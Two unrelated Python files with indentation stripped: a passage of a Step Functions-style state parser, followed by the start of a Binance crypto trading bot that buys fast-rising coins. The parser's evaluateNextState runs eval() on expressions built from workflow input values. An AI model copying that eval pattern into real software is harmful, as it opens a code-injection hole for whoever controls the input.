statedef = self.parsedfunctionstateinfo
statetype = self.functionstatetype
assert statetype == statedef['Type']
if statetype == StateUtils.waitStateType:
self._logger.debug("Wait state parsing")
if statetype == StateUtils.failStateType:
self._logger.debug("Fail state parsing")
if statetype == StateUtils.succeedStateType:
self._logger.debug("Succeed state parsing")
if statetype == StateUtils.taskStateType:
#self._logger.debug("Task state parsing")
if "InputPath" in statedef: # read the I/O Path dicts
self.input_path_dict['InputPath'] = statedef['InputPath']
#self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
#self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if "Catch" in statedef:
self.catcher_list = statedef['Catch']
# parse it once and store it
self.catcher_list = ast.literal_eval(str(self.catcher_list))
#self._logger.debug("found Catchers: " + str(self.catcher_list))
if "Retry" in statedef:
self.retry_list = statedef['Retry']
# parse it once and store it
self.retry_list = ast.literal_eval(str(self.retry_list))
#self._logger.debug("found Retry: " + str(self.retry_list))
if statetype == StateUtils.choiceStateType:
#self._logger.debug("Choice state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(statedef['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(statedef['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
self._logger.debug("Choice state rules: " + json.dumps(statedef))
if "Default" in statedef:
self.default_next_choice.append(statedef["Default"])
self._logger.debug("DefaultTarget: " + str(self.default_next_choice))
#choice_state_default = statedef['Default']
choices_list = statedef['Choices'] # get the choice rule list for this state
self._logger.debug("Choice state rules list: " + str(choices_list))
key_dict = {} # parse the choice rule list into an expression tree
for choices in choices_list:
self._logger.debug("Choice state rule element processed: " + json.dumps(list(choices.keys())))
#self._logger.debug("converted_function_output: " + str(converted_function_output))
operator_counter = 0
if ("Not" in list(choices.keys())) or ("And" in list(choices.keys())) or ("Or" in list(choices.keys())):
operator_counter += 1
if operator_counter == 0: # No operators, so no recursive evaluation required
self.traverse(choices['Next'], choices)
hostname = self.nodelist[-1].split("/")[0]
childname = self.nodelist[-1].split("/")[1]
previousnode = anytree.Node(choices['Next'])
root = previousnode
key_dict[hostname] = previousnode
previousnode = anytree.Node(childname, parent=previousnode) # key_dict[hostname])
#evalname = ast.literal_eval(str(previousnode.name))
else: # operator detected, we need to traverse the choice rule tree
self.traverse(choices['Next'], choices)
nodename = self.nodelist[-1].split("/")[0]
previousnode = anytree.Node(nodename)
root = previousnode
key_dict[self.nodelist[-1].split("/{")[0]] = previousnode
no_childs = 1 # we already have attached the root
for i in range(len(self.nodelist)): # count the nodes in the choice rule tree which do not have children
children = self.nodelist[-(i+1)].split("/")[-1]
if children.strip("") == "{}":
no_childs += 1
for i in range(no_childs):
nodename = self.nodelist[-(i+2)].split("/")[i+1]
previousnode = anytree.Node(nodename, parent=previousnode)
key_dict[self.nodelist[-(i+2)].split("/{")[0]] = previousnode
# from now on we have to attach the children expressions
for i in range(len(self.nodelist)-no_childs):
childname = self.nodelist[-(i+no_childs+1)].split("/")[-1]
hostname = self.nodelist[-(i+no_childs+1)].split("/{")[0]
previousnode = anytree.Node(childname, key_dict[hostname])
#test = EvaluateNode(root.children[0])
#self._logger.debug("Evaluate: " + str(test) + ", Next: " + choices['Next']) # + str(json.dumps(value))
#input_json={}
#self._logger.debug("value type: " + value)
#for key in value.keys():
#if key in test:
#self._logger.debug("Modified Evaluate: " + key)
#test.replace(key, test[key])
#self._logger.debug("Modified Evaluate: " + test)
##self._logger.debug("Resulting Rendered Tree: " + str(anytree.RenderTree(root)))
self.parsed_trees.append(root)
#if statedef[substates]['Type'] == "Task":
# self._logger.debug("Task state: " + json.dumps(statedef[substates]))
if statetype == StateUtils.passStateType:
self._logger.debug("[StateUtils] Pass state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
#self._logger.debug("found Next: " + json.dumps(statedef['Next']))
#self._logger.debug("found Result: " + json.dumps(statedef['Result']))
if statetype == StateUtils.parallelStateType:
#self._logger.debug("[StateUtils] Parallel state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if statetype == StateUtils.mapStateType:
#self._logger.debug("[StateUtils] Parallel state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "ItemsPath" in statedef:
self.items_path_dict['ItemsPath'] = statedef['ItemsPath']
self._logger.debug("found ItemsPath: " + json.dumps(self.items_path_dict['ItemsPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
def EvaluateNode(self, node):
"""
Recursively parse the expression tree starting from the given node into a Python statement.
"""
if not node.children: # this is a leaf node
evalname = json.dumps(ast.literal_eval(str(node.name)))
#type(evalname) == int or type(evalname) == float:
ev_expr = "(" + self.evaluate(evalname) + ")"
return ev_expr
else: #node is an operator
if node.name == "Not": # there can be only one child
child = node.children[0]
evalname = json.dumps(ast.literal_eval(str(child.name)))
ev_expr = self.evaluate(evalname)
return "not (%s)" % ev_expr
if node.name == "And": # collect all children recursively
child_and_array = []
for child in node.children:
child_and_array.append(self.EvaluateNode(child))
returnstr = "(" + " and ".join(child_and_array) + ")"
return returnstr
if node.name == "Or": # collect all children recursively
child_or_array = []
for child in node.children:
child_or_array.append(self.EvaluateNode(child))
returnstr = "(" + " or ".join(child_or_array) + ")"
return returnstr
else: # unknown operator found here. Throw an error!
raise Exception("Parse Error: unknown operator found: ", node.name)
def evaluate(self, expression):
"""
Evaluate an AWS Choice rule expression with the data contained in the values.
"""
expr = []
ex = json.loads(expression)
self._logger.debug(expression)
vals = {}
if "Variable" in ex.keys():
k = ex["Variable"].split("$.")[1]
vals[k] = ""
expr.append(k)
for op in self.operators:
if op in ex.keys():
expr.append(self.operators_python[self.operators.index(op)])
expr.append(ex[op])
break
if isinstance(expr[2], (int, float)):
result = "%s %s %s" % (expr[0], expr[1], expr[2])
else:
result = "%s %s '%s'" % (expr[0], expr[1], expr[2]) # we want to compare strings with strings
return result
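# Hedged example (assumes self.operators maps "NumericGreaterThan" to ">" and "StringEquals"
# to "=="; the rule contents are made up):
#
#   evaluate('{"Variable": "$.count", "NumericGreaterThan": 10}')  ->  "count > 10"
#   evaluate('{"Variable": "$.kind", "StringEquals": "Private"}')  ->  "kind == 'Private'"
#
# Numeric comparands are emitted bare, string comparands are quoted so the generated
# expression compares strings with strings.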
def process_parameters(self, parameters, state_data):
"""
Evaluate JSON path Parameters in conjunction with state_data.
"""
parameters = parameters['Parameters']
ret_value = None
ret_item_value = None
if parameters == "$": # return unfiltered input data
ret_value = state_data
elif parameters is None: #return empty json
ret_value = {}
else: # contains a parameter filter, get it and return selected kv pairs
ret_value = {}
ret_index = {}
for key in parameters.keys(): # process parameters keys
if key.casefold() == "comment".casefold(): # ignore
ret_value[key] = parameters[key]
elif parameters[key] == "$$.Map.Item.Value": # get Items key
value_key = key.split(".$")[0]
ret_value = value_key
ret_item_value = value_key
elif parameters[key] == "$$.Map.Item.Index": # get Index key
index_key = key.split(".$")[0]
ret_index = index_key
else: # processing more complex Parameters values
if isinstance(parameters[key], dict): # parameters key refers to dict value
ret_value[key] = {}
for k in parameters[key]: # get nested keys
if not k.split(".")[-1] == "$": # parse static value
print (parameters[key][k])
ret_value[key][k] = parameters[key][k]
else:
new_key = k.split(".$")[0] # use the json paths in paramters to match
ret_value[key][new_key] = [match.value for match in parse(parameters[key][k]).find(state_data)][0]
return ret_value
if isinstance(parameters[key], str): # parameters key refers to string value
ret_value = {}
new_key = key.split(".$")[0] # get the parameters key
query_key = parameters[key].split("$.")[1] # correct the correspondig value
new_value = state_data[query_key] # save the actual value before replacing the key
for kk in state_data.keys():
if isinstance(state_data[kk], dict): # value encapsulates dict
ret_value[new_key] = new_value
if ret_item_value != None:
ret_value[ret_item_value] = state_data[kk]
else:
raise Exception("Error: item value is not set!")
ret_value_dict = {}
ret_value_dict[kk] = ret_value
return ret_value_dict
if isinstance(state_data[kk], list): # value encapsulates list
ret_value_list = []
for data in state_data[kk]:
ret_value_list.append({new_key: new_value, ret_item_value: data})
ret_value_dict = {}
ret_value_dict[kk] = ret_value_list
return ret_value_dict
else:
raise Exception("Error: invaldid Parmeters format: " + str(parameters[key]))
# calculate transformed state output provided to Iterator
ret_total = []
ret_total_dict = {}
if isinstance(state_data, dict):
for kk in state_data.keys():
for key in state_data[kk]:
if ret_value != {} and ret_index == {}:
ret_total.append({ret_value: key})
elif ret_value == {} and ret_index != {}:
ret_total.append({ret_index: state_data[kk].index(key) })
elif ret_value != {} and ret_index != {}:
ret_total.append({ret_value: key, ret_index: state_data[kk].index(key) })
else:
raise Exception("Map State Parameters parse error on dict input: " + str(state_data))
ret_total_dict[kk] = ret_total
ret_value = ret_total_dict
elif isinstance(state_data, list):
for key in state_data:
if ret_value != {} and ret_index == {}:
ret_total.append({ret_value: key})
elif ret_value == {} and ret_index != {}:
ret_total.append({ret_index: state_data.index(key) })
elif ret_value != {} and ret_index != {}:
ret_total.append({ret_value: key, ret_index: state_data.index(key) })
else:
raise Exception("Map State Parameters parse error on list input: " + str(list))
ret_value = ret_total
else:
raise Exception("Map state parse error: invalid state input")
return ret_value
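# Hedged illustration of the Map-state branch above (all names hypothetical): with
# Parameters {"Parameters": {"item.$": "$$.Map.Item.Value", "index.$": "$$.Map.Item.Index"}}
# and state_data ["a", "b"], the keys are reduced to "item" and "index" and the list branch
# at the end produces [{"item": "a", "index": 0}, {"item": "b", "index": 1}], i.e. one input
# object per Iterator invocation.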
def process_items_path(self, path_fields, state_data):
ret_value = None
if 'ItemsPath' not in list(path_fields.keys()):
path_fields['ItemsPath'] = "$"
input_path = path_fields['ItemsPath']
if input_path == "$": # return unfiltered input data
ret_value = state_data
elif input_path is None: #return empty list
ret_value = []
else: # it contains a filter, get it and return selected list in input
self._logger.debug("seeing items_path filter: " + str(input_path) + " " + str(state_data))
filtered_state_data = [match.value for match in parse(input_path).find(state_data)]
if not filtered_state_data:
raise Exception("Items Path processing exception: no match with map state item, invalid path!")
else:
filtered_state_data = [match.value for match in parse(input_path).find(state_data)][0]
ret_value = filtered_state_data
return ret_value
def process_input_path(self, path_fields, state_data):
ret_value = None
if 'InputPath' not in list(path_fields.keys()):
path_fields['InputPath'] = "$"
#return state_data
input_path = path_fields['InputPath']
if input_path == "$": # return unfiltered input data
ret_value = state_data
elif input_path is None: #return empty dict
ret_value = {}
else: # input_path contains a filter, get and apply it
self._logger.debug("seeing input_path filter: " + str(input_path) + " " + str(state_data))
filtered_state_data = [match.value for match in parse(input_path).find(state_data)]
self._logger.debug("after seeing input_path filter: " + str(filtered_state_data))
if not filtered_state_data:
raise Exception("Input Path processing exception: no match with state input item, invalid path!")
else:
filtered_state_data = [match.value for match in parse(input_path).find(state_data)][0]
ret_value = filtered_state_data
return ret_value
def nested_dict(self, keys, value):
if len(keys) == 1:
return {keys[0]: value}
return {keys[0]: self.nested_dict(keys[1:], value)}
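# Quick illustration: nested_dict(["a", "b", "c"], 7) returns {"a": {"b": {"c": 7}}}; it is
# used below to graft a task result onto the state input at the position named by ResultPath.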
def process_result_path(self, path_fields, state_data, task_output):
ret_value = None
# path_fields: result path dict
# state_data: input dict
# task_output: output of the state/task
if 'ResultPath' not in list(path_fields.keys()):
path_fields['ResultPath'] = "$"
result_path = path_fields['ResultPath']
if result_path == "$":
ret_value = state_data
elif result_path is None:
ret_value = {}
else: # result_path is not empty so is there a match?
self._logger.debug("inside ResultPath processing: " + str(result_path) + " " + str(task_output) )
keys = list(tokenize(result_path)) # get all keys
filtered_state_data = self.nested_dict(keys[1:], task_output)
if isinstance(state_data, dict):
ret_value = dict(list(filtered_state_data.items()) + list(state_data.items())) # adding key and values to new dict
else:
ret_value = filtered_state_data
return ret_value
def process_output_path(self, path_fields, raw_state_input_midway):
ret_value = None
if 'OutputPath' not in list(path_fields.keys()):
path_fields['OutputPath'] = "$"
output_path = path_fields['OutputPath']
if output_path == "$":
ret_value = raw_state_input_midway
elif output_path is None:
ret_value = {}
else: # output_path is not empty so is there a match?
filtered_state_data = [match.value for match in parse(output_path).find(raw_state_input_midway)]
if not filtered_state_data:
raise Exception("Exception: no match with state input item, invalid path!")
else:
key = str(parse(output_path).nodes[-1].value[0])
filtered_state_data = raw_state_input_midway[key]
ret_value = filtered_state_data
return ret_value
def traverse(self, path, obj):
"""
Traverse the object recursively and record every path / value pair in self.nodelist.
"""
cnt = -1
if isinstance(obj, dict):
d = obj
d_sum = {}
for k, v in list(d.items()):
if isinstance(v, dict):
self.traverse(path + "/" + k, v)
elif isinstance(v, list):
self.traverse(path + "/" + k, v)
else:
d_sum[k] = v
self.nodelist.append(path + "/" + str(d_sum))
if isinstance(obj, list):
li = obj
for e in li:
cnt += 1
if isinstance(e, dict):
self.traverse("{path}".format(path=path), e)
elif isinstance(e, list):
self.traverse("{path}".format(path=path), e)
def evaluateNextState(self, function_input):
# this should be called for Choice state only
# for the rest the next values are statically defined and are parsed by hostagent
nextfunc = self.default_next_choice[-1]
self._logger.debug("[StateUtils] choice_function_input: " + str(function_input))
for tree in self.parsed_trees:
##self._logger.debug("Resulting Rendered Tree: " + str(anytree.RenderTree(tree.root)))
##self._logger.debug("Resulting Rendered Tree Root: " + str(tree.root))
test = self.EvaluateNode(tree.children[0])
self._logger.debug("[StateUtils] choice test: " + str(test))
self._logger.debug("Resulting Parsed Expression: " + str(test))
self._logger.debug("Current Value String: " + json.dumps(function_input))
# Sample value input to choice {"Comment": "Test my Iterator function", "iterator": {"count": 10, "index": 5, "step": 1}}
for key in list(function_input.keys()):
new_test = "False"
key = str(key)
if key == "Comment":
continue
#if "iterator.continue" == str(key):
self._logger.debug("[StateUtils] choice value key under test: " + key)
#keys = "continue"
if key in str(test):
val = function_input[key]
self._logger.debug("[StateUtils] choice val: " + str(val))
if isinstance(val, (int, float)): # calculate new_test value, no additional processing of values
self._logger.debug("[StateUtils] choice key/val: " + key + "/" + str(val))
new_test = test.replace(key, str(val))
self._logger.debug("[StateUtils] choice eval new_test: " + str(eval(str(new_test))))
elif "." in test: # need to process the json path of this variable name
test2 = "$." + test.lstrip('(').rstrip(')').split("==")[0] # rebuild the json path for the variable
jsonpath_expr = parse(test2)
choice_state_path_data = [match.value for match in jsonpath_expr.find(function_input)]
new_test = str(choice_state_path_data[0])
else:
new_test = test.replace(key, "'" + str(val)+"'") # need to add high colons to key to mark as string inside the expression
if eval(str(new_test)):
nextfunc = tree.root.name.strip("/")
self._logger.debug("now calling: " + str(nextfunc))
return nextfunc # {"next":nextfunc, "value": post_processed_value}
# if no choice rule applied, return the last one (assigned at the beginning)
self._logger.debug("now calling: " + str(nextfunc))
return nextfunc
|
Binance Detect Moonings.py
|
# use for environment variables
import os
# use if needed to pass args to external modules
import sys
# used to create threads & dynamic loading of modules
import threading
import importlib
# used for directory handling
import glob
# Needed for colorful console output. Install with: python3 -m pip install colorama (Mac/Linux) or pip install colorama (PC)
from colorama import init
init()
# needed for the binance API and websockets
from binance.client import Client
# used for dates
from datetime import date, datetime, timedelta
import time
# used to repeatedly execute the code
from itertools import count
# used to store trades and sell assets
import json
# Load helper modules
from helpers.parameters import (
parse_args, load_config
)
# Load creds modules
from helpers.handle_creds import (
load_correct_creds
)
# for colourful logging to the console
class txcolors:
BUY = '\033[92m'
WARNING = '\033[93m'
SELL_LOSS = '\033[91m'
SELL_PROFIT = '\033[32m'
DIM = '\033[2m\033[35m'
DEFAULT = '\033[39m'
# tracks profit/loss each session
global session_profit
session_profit = 0
# print with timestamps
import sys
old_out = sys.stdout
class St_ampe_dOut:
"""Stamped stdout."""
nl = True
def write(self, x):
"""Write function overloaded."""
if x == '\n':
old_out.write(x)
self.nl = True
elif self.nl:
old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}')
self.nl = False
else:
old_out.write(x)
def flush(self):
pass
sys.stdout = St_ampe_dOut()
def get_price(add_to_historical=True):
'''Return the current price for all coins on binance'''
global historical_prices, hsp_head
initial_price = {}
prices = client.get_all_tickers()
for coin in prices:
if CUSTOM_LIST:
if any(item + PAIR_WITH == coin['symbol'] for item in tickers) and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
else:
if PAIR_WITH in coin['symbol'] and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
if add_to_historical:
hsp_head = (hsp_head + 1) % (TIME_DIFFERENCE * RECHECK_INTERVAL)
historical_prices[hsp_head] = initial_price
return initial_price
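# Hedged note (the numbers are illustrative, not the shipped defaults): historical_prices acts
# as a circular buffer of length TIME_DIFFERENCE * RECHECK_INTERVAL and hsp_head is the write
# cursor, so with TIME_DIFFERENCE = 5 and RECHECK_INTERVAL = 6 the bot keeps 30 snapshots,
# written roughly every 50 seconds by wait_for_price().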
def wait_for_price():
'''calls the initial price and ensures the correct amount of time has passed
before reading the current price again'''
global historical_prices, hsp_head, volatility_cooloff
volatile_coins = {}
externals = {}
coins_up = 0
coins_down = 0
coins_unchanged = 0
if historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
# sleep for exactly the amount of time required
time.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'])).total_seconds())
print(f'not enough time has passed yet...Session profit:{session_profit:.2f}%')
# retrieve latest prices
get_price()
# calculate the difference in prices
for coin in historical_prices[hsp_head]:
# minimum and maximum prices over time period
min_price = min(historical_prices, key = lambda x: float("inf") if x is None else float(x[coin]['price']))
max_price = max(historical_prices, key = lambda x: -1 if x is None else float(x[coin]['price']))
threshold_check = (-1.0 if min_price[coin]['time'] > max_price[coin]['time'] else 1.0) * (float(max_price[coin]['price']) - float(min_price[coin]['price'])) / float(min_price[coin]['price']) * 100
# each coin with gains above CHANGE_IN_PRICE is added to the volatile_coins dict, provided MAX_COINS has not been reached.
if threshold_check > CHANGE_IN_PRICE:
coins_up +=1
if coin not in volatility_cooloff:
volatility_cooloff[coin] = datetime.now() - timedelta(minutes=TIME_DIFFERENCE)
# only include coin as volatile if it hasn't been picked up in the last TIME_DIFFERENCE minutes already
if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=TIME_DIFFERENCE):
volatility_cooloff[coin] = datetime.now()
if len(coins_bought) + len(volatile_coins) < MAX_COINS or MAX_COINS == 0:
volatile_coins[coin] = round(threshold_check, 3)
print(f'{coin} has gained {volatile_coins[coin]}% within the last {TIME_DIFFERENCE} minutes, calculating volume in {PAIR_WITH}')
else:
print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are holding max number of coins{txcolors.DEFAULT}')
elif threshold_check < CHANGE_IN_PRICE:
coins_down +=1
else:
coins_unchanged +=1
# Disabled until fix
#print(f'Up: {coins_up} Down: {coins_down} Unchanged: {coins_unchanged}')
# Here goes new code for external signalling
externals = external_signals()
exnumber = 0
for excoin in externals:
if excoin not in volatile_coins and excoin not in coins_bought and (len(coins_bought) + exnumber) < MAX_COINS:
volatile_coins[excoin] = 1
exnumber +=1
print(f'External signal received on {excoin}, calculating volume in {PAIR_WITH}')
return volatile_coins, len(volatile_coins), historical_prices[hsp_head]
def external_signals():
external_list = {}
signals = {}
# check directory and load pairs from files into external_list
signals = glob.glob("signals/*.exs")
for filename in signals:
for line in open(filename):
symbol = line.strip()
external_list[symbol] = symbol
os.remove(filename)
return external_list
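# Hedged usage sketch (file name and symbol are made up): any signalling module can hand the
# bot a buy signal by dropping a plain-text file into signals/, e.g.
#
#   echo "DOGEUSDT" > signals/mymodule.exs
#
# Each line is read as a full pair symbol, queued for buying via external_signals(), and the
# file is deleted once it has been consumed.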
def convert_volume():
'''Converts the volume given in QUANTITY from USDT to each coin's volume'''
volatile_coins, number_of_coins, last_price = wait_for_price()
lot_size = {}
volume = {}
for coin in volatile_coins:
# Find the correct step size for each coin
# max accuracy for BTC for example is 6 decimal points
# while XRP is only 1
try:
info = client.get_symbol_info(coin)
step_size = info['filters'][2]['stepSize']
lot_size[coin] = step_size.index('1') - 1
if lot_size[coin] < 0:
lot_size[coin] = 0
except Exception:
pass
# calculate the volume in coin from QUANTITY in USDT (default)
volume[coin] = float(QUANTITY / float(last_price[coin]['price']))
# define the volume with the correct step size
if coin not in lot_size:
volume[coin] = float('{:.1f}'.format(volume[coin]))
else:
# if lot size has 0 decimal points, make the volume an integer
if lot_size[coin] == 0:
volume[coin] = int(volume[coin])
else:
volume[coin] = float('{:.{}f}'.format(volume[coin], lot_size[coin]))
return volume, last_price
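# Worked example of the step-size handling above (symbols hypothetical): a stepSize of
# '0.00100000' has '1' at index 4, so lot_size becomes 3 and the volume is formatted to three
# decimal places; a stepSize of '1.00000000' yields index 0 - 1 = -1, which is clamped to 0,
# and the volume is cast to an int.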
def buy():
'''Place Buy market orders for each volatile coin found'''
volume, last_price = convert_volume()
orders = {}
for coin in volume:
# only buy if there are no active trades on the coin
if coin not in coins_bought:
print(f"{txcolors.BUY}Preparing to buy {volume[coin]} {coin}{txcolors.DEFAULT}")
if TEST_MODE:
orders[coin] = [{
'symbol': coin,
'orderId': 0,
'time': datetime.now().timestamp()
}]
# Log trade
if LOG_TRADES:
write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")
continue
# try to create a real order if the test orders did not raise an exception
try:
buy_limit = client.create_order(
symbol = coin,
side = 'BUY',
type = 'MARKET',
quantity = volume[coin]
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if the position has been placed and return order info
else:
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
# binance sometimes returns an empty list, the code will wait here until binance returns the order
while orders[coin] == []:
print('Binance is being slow in returning the order, calling the API again...')
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
time.sleep(1)
else:
print('Order returned, saving order to file')
# Log trade
if LOG_TRADES:
write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")
else:
print(f'Signal detected, but there is already an active trade on {coin}')
return orders, last_price, volume
def sell_coins():
'''sell coins that have reached the STOP LOSS or TAKE PROFIT threshold'''
global hsp_head, session_profit
last_price = get_price(False) # don't populate rolling window
coins_sold = {}
for coin in list(coins_bought):
# define stop loss and take profit
TP = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['take_profit']) / 100
SL = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['stop_loss']) / 100
LastPrice = float(last_price[coin]['price'])
BuyPrice = float(coins_bought[coin]['bought_at'])
PriceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
# check whether the price is above the take profit and readjust SL and TP accordingly if the trailing stop loss is used
if float(last_price[coin]['price']) > TP and USE_TRAILING_STOP_LOSS:
if DEBUG: print("TP reached, adjusting TP and SL accordingly to lock-in profit")
# increasing TP by TRAILING_TAKE_PROFIT (essentially next time to readjust SL)
coins_bought[coin]['take_profit'] += TRAILING_TAKE_PROFIT
coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
continue
# check that the price is below the stop loss or above take profit (if trailing stop loss not used) and sell if this is the case
if float(last_price[coin]['price']) < SL or (float(last_price[coin]['price']) > TP and not USE_TRAILING_STOP_LOSS):
print(f"{txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}TP or SL reached, selling {coins_bought[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} : {PriceChange:.2f}%{txcolors.DEFAULT}")
# try to create a real order
try:
if not TEST_MODE:
sell_coins_limit = client.create_order(
symbol = coin,
side = 'SELL',
type = 'MARKET',
quantity = coins_bought[coin]['volume']
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if coin has been sold and create a dict for each coin sold
else:
coins_sold[coin] = coins_bought[coin]
# Log trade
if LOG_TRADES:
profit = (LastPrice - BuyPrice) * coins_sold[coin]['volume']
write_log(f"Sell: {coins_sold[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} Profit: {profit:.2f} {PriceChange:.2f}%")
session_profit += PriceChange
continue
# no action; print once every TIME_DIFFERENCE
if hsp_head == 1:
print(f'TP or SL not yet reached, not selling {coin} for now {BuyPrice} - {LastPrice} : {txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}{PriceChange:.2f}%{txcolors.DEFAULT}')
return coins_sold
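# Hedged worked example (the percentages are made up, not the config defaults): with
# bought_at = 100, TAKE_PROFIT = 0.8 and STOP_LOSS = 0.5, the initial TP and SL prices above
# are 100.8 and 99.5. If USE_TRAILING_STOP_LOSS is on and the price crosses 100.8, take_profit
# grows by TRAILING_TAKE_PROFIT (say 0.1) to 0.9 and stop_loss is reset to
# take_profit - TRAILING_STOP_LOSS (say 0.4), i.e. 0.5, so the new TP/SL prices are 100.9 and
# 100.5 and the position can only exit at a locked-in profit.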
def update_portfolio(orders, last_price, volume):
'''add every coin bought to our portfolio for tracking/selling later'''
if DEBUG: print(orders)
for coin in orders:
coins_bought[coin] = {
'symbol': orders[coin][0]['symbol'],
'orderid': orders[coin][0]['orderId'],
'timestamp': orders[coin][0]['time'],
'bought_at': last_price[coin]['price'],
'volume': volume[coin],
'stop_loss': -STOP_LOSS,
'take_profit': TAKE_PROFIT,
}
# save the coins in a json file in the same directory
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
print(f'Order with id {orders[coin][0]["orderId"]} placed and saved to file')
def remove_from_portfolio(coins_sold):
'''Remove coins sold due to SL or TP from portfolio'''
for coin in coins_sold:
coins_bought.pop(coin)
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
def write_log(logline):
timestamp = datetime.now().strftime("%d/%m %H:%M:%S")
with open(LOG_FILE,'a+') as f:
f.write(timestamp + ' ' + logline + '\n')
if __name__ == '__main__':
# Load arguments then parse settings
args = parse_args()
mymodule = {}
DEFAULT_CONFIG_FILE = 'config.yml'
DEFAULT_CREDS_FILE = 'creds.yml'
config_file = args.config if args.config else DEFAULT_CONFIG_FILE
creds_file = args.creds if args.creds else DEFAULT_CREDS_FILE
parsed_config = load_config(config_file)
parsed_creds = load_config(creds_file)
# Default no debugging
DEBUG = False
# Load system vars
TEST_MODE = parsed_config['script_options']['TEST_MODE']
LOG_TRADES = parsed_config['script_options'].get('LOG_TRADES')
LOG_FILE = parsed_config['script_options'].get('LOG_FILE')
DEBUG_SETTING = parsed_config['script_options'].get('DEBUG')
# Load trading vars
PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
QUANTITY = parsed_config['trading_options']['QUANTITY']
MAX_COINS = parsed_config['trading_options']['MAX_COINS']
FIATS = parsed_config['trading_options']['FIATS']
TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE']
RECHECK_INTERVAL = parsed_config['trading_options']['RECHECK_INTERVAL']
CHANGE_IN_PRICE = parsed_config['trading_options']['CHANGE_IN_PRICE']
STOP_LOSS = parsed_config['trading_options']['STOP_LOSS']
TAKE_PROFIT = parsed_config['trading_options']['TAKE_PROFIT']
CUSTOM_LIST = parsed_config['trading_options']['CUSTOM_LIST']
USE_TRAILING_STOP_LOSS = parsed_config['trading_options']['USE_TRAILING_STOP_LOSS']
TRAILING_STOP_LOSS = parsed_config['trading_options']['TRAILING_STOP_LOSS']
TRAILING_TAKE_PROFIT = parsed_config['trading_options']['TRAILING_TAKE_PROFIT']
